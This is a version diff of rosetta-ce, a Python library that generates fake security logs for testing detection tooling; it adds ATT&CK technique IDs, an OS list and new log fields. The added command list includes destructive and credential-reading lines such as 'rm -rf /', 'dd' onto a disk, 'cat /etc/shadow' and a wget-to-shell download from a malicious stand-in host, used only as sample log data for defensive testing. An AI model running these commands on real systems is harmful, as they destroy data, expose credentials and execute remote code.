rosetta-ce 1.6.6__py3-none-any.whl → 1.6.8__py3-none-any.whl

rosetta/constants/attributes.py

@@ -3,3 +3,283 @@ INCIDENTS_TYPES = [
     'Control Avoidance', 'Rogue Device', 'Denial Of Service', 'Account Compromised'
 ]
 SEVERITIES = ['Low', 'Medium', 'High', 'Critical']
+
+ATTACK_TECHNIQUES = [
+    "T1548",
+    "T1548.002",
+    "T1548.004",
+    "T1548.001",
+    "T1548.003",
+    "T1548.006",
+    "T1548.005",
+    "T1134",
+    "T1134.002",
+    "T1134.003",
+    "T1134.004",
+    "T1134.005",
+    "T1134.001",
+    "T1531",
+    "T1087",
+    "T1087.004",
+    "T1087.002",
+    "T1087.003",
+    "T1087.001",
+    "T1098",
+    "T1098.001",
+    "T1098.003",
+    "T1098.006",
+    "T1098.002",
+    "T1098.005",
+    "T1098.004",
+    "T1650",
+    "T1583",
+    "T1583.005",
+    "T1583.002",
+    "T1583.001",
+    "T1583.008",
+    "T1583.004",
+    "T1583.007",
+    "T1583.003",
+    "T1583.006",
+    "T1595",
+    "T1595.001",
+    "T1595.002",
+    "T1595.003",
+    "T1557",
+    "T1557.002",
+    "T1557.003",
+    "T1557.001",
+    "T1071",
+    "T1071.004",
+    "T1071.002",
+    "T1071.003",
+    "T1071.001",
+    "T1010",
+    "T1560",
+    "T1560.003",
+    "T1560.002",
+    "T1560.001",
+    "T1123",
+    "T1119",
+    "T1020",
+    "T1020.001",
+    "T1197",
+    "T1547",
+    "T1547.014",
+    "T1547.002",
+    "T1547.006",
+    "T1547.008",
+    "T1547.015",
+    "T1547.010",
+    "T1547.012",
+    "T1547.007",
+    "T1547.001",
+    "T1547.005",
+    "T1547.009",
+    "T1547.003",
+    "T1547.004",
+    "T1547.013",
+    "T1037",
+    "T1037.002",
+    "T1037.001",
+    "T1037.003",
+    "T1037.004",
+    "T1037.005",
+    "T1176",
+    "T1217",
+    "T1185",
+    "T1110",
+    "T1110.004",
+    "T1110.002",
+    "T1110.001",
+    "T1110.003",
+    "T1612",
+    "T1115",
+    "T1651",
+    "T1580",
+    "T1538",
+    "T1526",
+    "T1619",
+    "T1059",
+    "T1059.002",
+    "T1059.010",
+    "T1059.009",
+    "T1059.007",
+    "T1059.008",
+    "T1059.001",
+    "T1059.006",
+    "T1059.004",
+    "T1059.005",
+    "T1059.003",
+    "T1092",
+    "T1586",
+    "T1586.003",
+    "T1586.002",
+    "T1586.001",
+    "T1554",
+    "T1584",
+    "T1584.005",
+    "T1584.002",
+    "T1584.001",
+    "T1584.008",
+    "T1584.004",
+    "T1584.007",
+    "T1584.003",
+    "T1584.006",
+    "T1609",
+    "T1613",
+    "T1659",
+    "T1136",
+    "T1136.003",
+    "T1136.002",
+    "T1136.001",
+    "T1543",
+    "T1543.005",
+    "T1543.001",
+    "T1543.004",
+    "T1543.002",
+    "T1543.003",
+    "T1555",
+    "T1555.006",
+    "T1555.003",
+    "T1555.001",
+    "T1555.005",
+    "T1555.002",
+    "T1555.004",
+    "T1485",
+    "T1132",
+    "T1132.002",
+    "T1132.001",
+    "T1486",
+    "T1565",
+    "T1565.003",
+    "T1565.001",
+    "T1565.002",
+    "T1001",
+    "T1001.001",
+    "T1001.003",
+    "T1001.002",
+    "T1074",
+    "T1074.001",
+    "T1074.002",
+    "T1030",
+    "T1530",
+    "T1602",
+    "T1602.002",
+    "T1602.001",
+    "T1213",
+    "T1213.003",
+    "T1213.001",
+    "T1213.002",
+    "T1005",
+    "T1039",
+    "T1025",
+    "T1622",
+    "T1491",
+    "T1491.002",
+    "T1491.001",
+    "T1140",
+    "T1610",
+    "T1587",
+    "T1587.002",
+    "T1587.003",
+    "T1587.004",
+    "T1587.001",
+    "T1652",
+    "T1006",
+    "T1561",
+    "T1561.001",
+    "T1561.002",
+    "T1482",
+    "T1484",
+    "T1484.001",
+    "T1484.002",
+    "T1189",
+    "T1568",
+    "T1568.003",
+    "T1568.002",
+    "T1568.001",
+    "T1114",
+    "T1114.003",
+    "T1114.001",
+    "T1114.002",
+    "T1573",
+    "T1573.002",
+    "T1573.001",
+    "T1499",
+    "T1499.003",
+    "T1499.004",
+    "T1499.001",
+    "T1499.002",
+    "T1611",
+    "T1585",
+    "T1585.003",
+    "T1585.002",
+    "T1585.001",
+    "T1546",
+    "T1546.008",
+    "T1546.009",
+    "T1546.010",
+    "T1546.011",
+    "T1546.001",
+    "T1546.015",
+    "T1546.014",
+    "T1546.012",
+    "T1546.016",
+    "T1546.006",
+    "T1546.007",
+    "T1546.013",
+    "T1546.002",
+    "T1546.005",
+    "T1546.004",
+    "T1546.003",
+    "T1480",
+    "T1480.001",
+    "T1048",
+    "T1048.002",
+    "T1048.001",
+    "T1048.003",
+    "T1041",
+    "T1011",
+    "T1011.001",
+    "T1052",
+    "T1052.001",
+    "T1567",
+    "T1567.004",
+    "T1567.002",
+    "T1567.001",
+    "T1567.003",
+    "T1190",
+    "T1203",
+    "T1212",
+    "T1211",
+    "T1068",
+    "T1210",
+    "T1133",
+    "T1008",
+    "T1083",
+    "T1222",
+    "T1222.002",
+    "T1222.001",
+    "T1657",
+    "T1495",
+    "T1187",
+    "T1606",
+    "T1606.002",
+    "T1606.001",
+    "T1592",
+    "T1592.004",
+    "T1592.003",
+    "T1592.001",
+    "T1592.002",
+    "T1589",
+    "T1589.001",
+    "T1589.002",
+    "T1589.003",
+    "T1590",
+    "T1590.002",
+    "T1590.001",
+    "T1590.005",
+    "T1590.006",
+    "T1590"
+]

rosetta/constants/systems.py

@@ -1,3 +1,45 @@
+OS_LIST = [
+    "AIX 7.2",
+    "HP-UX 11i v3",
+    "Solaris 11",
+    "FreeBSD 13.2",
+    "OpenBSD 7.4",
+    "NetBSD 10.0",
+    "Ubuntu 22.04 LTS",
+    "Red Hat Enterprise Linux 9",
+    "CentOS 8",
+    "Debian 12",
+    "Fedora 38",
+    "Arch Linux 2024.09",
+    "Kali Linux 2024.1",
+    "Alpine Linux 3.18",
+    "SUSE Linux Enterprise Server 15 SP4",
+    "Windows 10 Pro",
+    "Windows 11 Home",
+    "Windows Server 2019",
+    "Windows Server 2022",
+    "Windows 8.1",
+    "Windows 7 SP1",
+    "macOS Ventura 13",
+    "macOS Monterey 12",
+    "macOS Big Sur 11",
+    "macOS Catalina 10.15",
+    "macOS Mojave 10.14",
+    "iOS 17",
+    "iPadOS 17",
+    "Android 14",
+    "HarmonyOS 3.1"
+]
+UNIX_CMD = [
+    "cat /etc/shadow",
+    "dd if=/dev/zero of=/dev/sda",
+    "rm -rf /",
+    "find / -name '*.log' -exec rm -f {} \\;",
+    "wget -O- http://malicious.example.com/malware | sh",
+    "iptables -F",
+    "chmod -R 777 /",
+    "chown -R nobody:nogroup /"
+]
 UNIX_CMD = [
     "cat /etc/shadow",
     "dd if=/dev/zero of=/dev/sda",
@@ -80,7 +122,7 @@ WIN_EVENTS = [
     '<Data Name="ProcessName">{process_name}</Data><Data Name="ProcessId">{process_id}</Data>'
     '<Data Name="DestinationLogonId">{destination_login_id}</Data>'
     '<Data Name="SourceNetworkAddress">{source_network_address}</Data>'
-    '<Data Name="SourcePort">{source_port}</Data><Data Name="LogonGuid">{guid}</Data>'
+    '<Data Name="SourcePort">{local_port}</Data><Data Name="LogonGuid">{guid}</Data>'
     '<Data Name="TransmittedServices">{transmitted_services}</Data></EventData></Event>',
     '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
     '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'

rosetta/rfaker.py

@@ -12,8 +12,8 @@ from datetime import datetime, timedelta
 from typing import Optional, List
 from rosetta.constants.sources import BAD_IP_SOURCES, GOOD_IP_SOURCES, BAD_URL_SOURCES, GOOD_URL_SOURCES, \
     BAD_SHA256_SOURCES, GOOD_SHA256_SOURCES, CVE_SOURCES, TERMS_SOURCES
-from rosetta.constants.systems import UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
-from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES
+from rosetta.constants.systems import OS_LIST, UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
+from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES, ATTACK_TECHNIQUES
 from rosetta.constants.sensors import ACTIONS, PROTOCOLS, TECHNIQUES, ERROR_CODE
 from rosetta.constants.db import QUERY_TYPE, DATABASE_NAME, QUERY
 
@@ -37,7 +37,7 @@ class Observables:
                 dst_host: Optional[list] = None, src_domain: Optional[list] = None, dst_domain: Optional[list] = None,
                 sender_email: Optional[list] = None, recipient_email: Optional[list] = None,
                 email_subject: Optional[list] = None, email_body: Optional[list] = None,
-                url: Optional[list] = None, source_port: Optional[list] = None, remote_port: Optional[list] = None,
+                url: Optional[list] = None, local_port: Optional[list] = None, remote_port: Optional[list] = None,
                 protocol: Optional[list] = None, inbound_bytes: Optional[list] = None,
                 outbound_bytes: Optional[list] = None, app: Optional[list] = None, os: Optional[list] = None,
                 user: Optional[list] = None, cve: Optional[list] = None, file_name: Optional[list] = None,
@@ -63,7 +63,7 @@ class Observables:
         self.email_subject = email_subject
         self.email_body = email_body
         self.url = url
-        self.source_port = source_port
+        self.local_port = local_port
         self.remote_port = remote_port
         self.protocol = protocol
         self.inbound_bytes = inbound_bytes
@@ -301,6 +301,9 @@ class Events:
         if field == "src_host":
             field_value = random.choice(observables.src_host) if observables and observables.src_host \
                 else faker.hostname()
+        if field == "dst_host":
+            field_value = random.choice(observables.dst_host) if observables and observables.dst_host \
+                else faker.hostname()
         if field == "user":
             field_value = random.choice(observables.user) if observables and observables.user \
                 else faker.user_name()
@@ -313,6 +316,9 @@ class Events:
         if field == "unix_cmd":
             field_value = random.choice(observables.unix_cmd) if observables and observables.unix_cmd \
                 else random.choice(UNIX_CMD)
+        if field == "technique":
+            field_value = random.choice(observables.technique) if observables and observables.technique \
+                else random.choice(ATTACK_TECHNIQUES)
         if field == "severity":
             field_value = random.choice(observables.severity) if observables and observables.severity \
                 else random.choice(SEVERITIES)
@@ -324,6 +330,12 @@ class Events:
         if field == "remote_ip":
             field_value = random.choice(observables.remote_ip) if observables and observables.remote_ip \
                     else Observables.generator(observable_type=ObservableType.IP, known=ObservableKnown.BAD, count=1)[0]
+        if field == "local_ip_v6":
+            field_value = random.choice(observables.local_ip_v6) if observables and observables.local_ip_v6 \
+                    else faker.ipv6()
+        if field == "remote_ip_v6":
+            field_value = random.choice(observables.remote_ip_v6) if observables and observables.remote_ip_v6 \
+                    else faker.ipv6()            
         if field == "remote_port":
             field_value = random.choice(observables.remote_port) if observables and observables.remote_port \
                     else faker.random_int(min=1024, max=65535)
@@ -336,6 +348,12 @@ class Events:
         if field == "outbound_bytes":
             field_value = random.choice(observables.outbound_bytes) if observables and observables.outbound_bytes \
                     else faker.random_int(min=10, max=1073741824)
+        if field == "app":
+            field_value = random.choice(observables.app) if observables and observables.app \
+                    else faker.sentence(nb_words=2)
+        if field == "os":
+            field_value = random.choice(observables.os) if observables and observables.os \
+                    else random.choice(OS_LIST)
         if field == "protocol":
             field_value = random.choice(observables.protocol) if observables and observables.protocol \
                     else random.choice(PROTOCOLS)
@@ -348,6 +366,9 @@ class Events:
         if field == "src_domain":
             field_value = random.choice(observables.src_domain) if observables and observables.src_domain \
                     else faker.domain_name()
+        if field == "dst_domain":
+            field_value = random.choice(observables.dst_domain) if observables and observables.dst_domain \
+                    else faker.domain_name()
         if field == "sender_email":
             field_value = random.choice(observables.sender_email) if observables and observables.sender_email \
                     else faker.email()
@@ -425,7 +446,7 @@ class Events:
         if field == "file_name":
             field_value = random.choice(observables.file_name) if observables and observables.file_name \
                 else faker.file_name()
-        if field == "cve_id":
+        if field == "cve":
             field_value = random.choice(observables.cve) if observables and observables.cve \
                     else Observables.generator(observable_type=ObservableType.CVE, count=1)
         if field == "file_hash":
@@ -689,7 +710,7 @@ class Events:
                                                  domain_name=domain_name, subject_login_id=subject_login_id,
                                                  privilege_list=privilege_list, cmd=cmd,
                                                  destination_login_id=destination_login_id,
-                                                 source_network_address=source_network_address, source_port=local_port,
+                                                 source_network_address=source_network_address, local_port=local_port,
                                                  transmitted_services=transmitted_services, file_name=file_name)
             winevent_messages.append(win_event)
         return winevent_messages

{rosetta_ce-1.6.6.dist-info → rosetta_ce-1.6.8.dist-info}/METADATA

@@ -1,6 +1,6 @@
 Metadata-Version: 2.1
 Name: rosetta-ce
-Version: 1.6.6
+Version: 1.6.8
 Summary: Rosetta is a Python package that can be used to fake security logs and alerts for testing different detection and response use cases.
 Home-page: https://github.com/ayman-m/rosetta
 Author: Ayman Mahmoud

{rosetta_ce-1.6.6.dist-info → rosetta_ce-1.6.8.dist-info}/RECORD

@@ -1,15 +1,15 @@
 rosetta/__init__.py,sha256=9rqZF7bpDMRN5H-rjNRUfzQAOIqyc21hTTZfYufTy04,92
 rosetta/rconverter.py,sha256=oPdWMtO6_aeQC8PqCl4nHKEpVb1kaBACSaNXsz-o00Q,3008
-rosetta/rfaker.py,sha256=rtMwVHVUAEQ_trRkX1n4BgfJFSIV5zhQhDIChKWTLkA,45877
+rosetta/rfaker.py,sha256=wNpbfR7nc_MfkQzUitLI1zMBjDYv1TEbtBnA8sCWW5E,47172
 rosetta/rsender.py,sha256=Zfj9MVckO49iabxCQ19fkGKpKnzOXB1iHOTb9CgkzsE,10463
 rosetta/constants/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0
-rosetta/constants/attributes.py,sha256=ZWl1xHAAv0jh1oqyOCR9RjqbdaDsmBKSq59ame2HNgo,269
+rosetta/constants/attributes.py,sha256=dxPzi5D00U8Fvo1B1u1bC5-kYqN3lCIpYwwroHHp-hw,4622
 rosetta/constants/db.py,sha256=ZobruGzgijbbFHEnLGuwVwZTxLCBL-_vdmUDPVv3OAo,4708
 rosetta/constants/sensors.py,sha256=ZxPWFrNqDFKRVn9ai-5vtvIiU4-3FAXQIRj7gFoBRPk,1936
 rosetta/constants/sources.py,sha256=b3ynlKGw1gw7VBA4yCYkJ7aq4vVPfypqA8W_kuAZaBA,1658
-rosetta/constants/systems.py,sha256=dxFLs55Lg03rR-0T7bTFcKsdoXQuURFvGKFLO5IR_tM,6478
-rosetta_ce-1.6.6.dist-info/LICENSE,sha256=jF5fCbmI1A-yyvPAEeQ5VHM094tRLlWsMyun-UlX-pQ,1070
-rosetta_ce-1.6.6.dist-info/METADATA,sha256=WMGg1h8zsKTNBZmJdgE67pmE-80WIMZZ-s4j72m7M1o,11321
-rosetta_ce-1.6.6.dist-info/WHEEL,sha256=cVxcB9AmuTcXqmwrtPhNK88dr7IR_b6qagTj0UvIEbY,91
-rosetta_ce-1.6.6.dist-info/top_level.txt,sha256=HLxDc6BJxHZDzVIlOwpCGH0DqIf65OhZcHniRDaUUZc,8
-rosetta_ce-1.6.6.dist-info/RECORD,,
+rosetta/constants/systems.py,sha256=bdXUf93iKXMdxnjkBIiE1qC-QlyqVsUd5gVfFqHfddg,7431
+rosetta_ce-1.6.8.dist-info/LICENSE,sha256=jF5fCbmI1A-yyvPAEeQ5VHM094tRLlWsMyun-UlX-pQ,1070
+rosetta_ce-1.6.8.dist-info/METADATA,sha256=kFS9ZB13yJe0ZUZA_SZib1MWzfEw517DLRTr2FV1Ok4,11321
+rosetta_ce-1.6.8.dist-info/WHEEL,sha256=GV9aMThwP_4oNCtvEC2ec3qUYutgWeAzklro_0m4WJQ,91
+rosetta_ce-1.6.8.dist-info/top_level.txt,sha256=HLxDc6BJxHZDzVIlOwpCGH0DqIf65OhZcHniRDaUUZc,8
+rosetta_ce-1.6.8.dist-info/RECORD,,

{rosetta_ce-1.6.6.dist-info → rosetta_ce-1.6.8.dist-info}/WHEEL

@@ -1,5 +1,5 @@
 Wheel-Version: 1.0
-Generator: setuptools (74.1.2)
+Generator: setuptools (75.1.0)
 Root-Is-Purelib: true
 Tag: py3-none-any